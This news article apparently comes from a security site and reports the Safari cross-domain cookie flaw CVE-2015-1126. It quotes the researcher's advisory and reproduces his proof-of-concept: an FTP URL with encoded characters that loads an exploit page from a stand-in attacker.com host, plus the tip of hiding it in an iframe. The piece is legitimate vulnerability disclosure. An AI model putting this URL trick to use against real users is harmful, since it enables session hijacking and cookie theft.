Safari cookie access vulnerability affects a billion iThings

Pierluigi Paganini April 18, 2015

A Safari iOS/OS X/Windows cookie access vulnerability (CVE-2015-1126) potentially affects a billion iThings devices, patch it as soon as possible.

The security researcher Jouko Pynnönen at Finnish firm Klikki Oy, has discovered a since patched bug (CVE-2015-1126) that could potentially affect a billion Apple iDevices. The cross-domain vulnerability affects Safari’s file transfer URL schemes and could be exploited by attackers to create specially crafted web page which, when visited by a target user, bypasses some of the normal cross-domain restrictions to access or modify HTTP cookies belonging to any website.

“An attacker could create web content which, when viewed by a target user, bypasses some of the normal cross-domain restrictions to access or modify HTTP cookies belonging to any website.” Pynnönen wrote in a security advisory. “Most websites which allow user logins store their authentication information (usually session keys) in cookies. Access to these cookies would allow hijacking authenticated sessions. All tested Safari versions on iOS, OS X, and Windows were vulnerable. The number of affected devices may be of the order of one billion.”

The researcher explained that the Safari browser running on iOS 8.1, 6.1.6, and versions 7.0.4 and 5.1.7 on OS X 10.9.3 and Windows 8.1 are vulnerable.

Safari flawThe security issue it triggered in present of encoded special characters the user or password field of the URL, an example of problematic link could be

ftp://user:password@host/path

when the user or password fields include encoded special characters. By manipulating the URL, the attacker can allow documents to be loaded from their sites.

Pynnönen provided the following example URL as PoC

ftp://user%40attacker.com%2Fexploit.html%[email protected]/

using a vulnerable version will cause the loading of a document from the website attacker.com controlled by the attackers, meanwhile patched browsers would pull a document from Apple. A vulnerable browser will decode the URL in:

ftp://[email protected]/exploit.html#apple.com/

“The attacker-supplied document, exploit.html, can therefore access and modify cookies belonging to apple.com via JavaScript.” explain Pynnönen.

The attack can be run by embedding IFRAME pointing to an FTP URL in an apparently harmless webpage.

The vulnerability is Safari was fixed byApple, users can check is their browser is vulnerable using the Safari cookie vulnerability test published by Pynnönen.

Pierluigi Paganini

(Security Affairs –  Apple Safari, iThings)



you might also like

leave a comment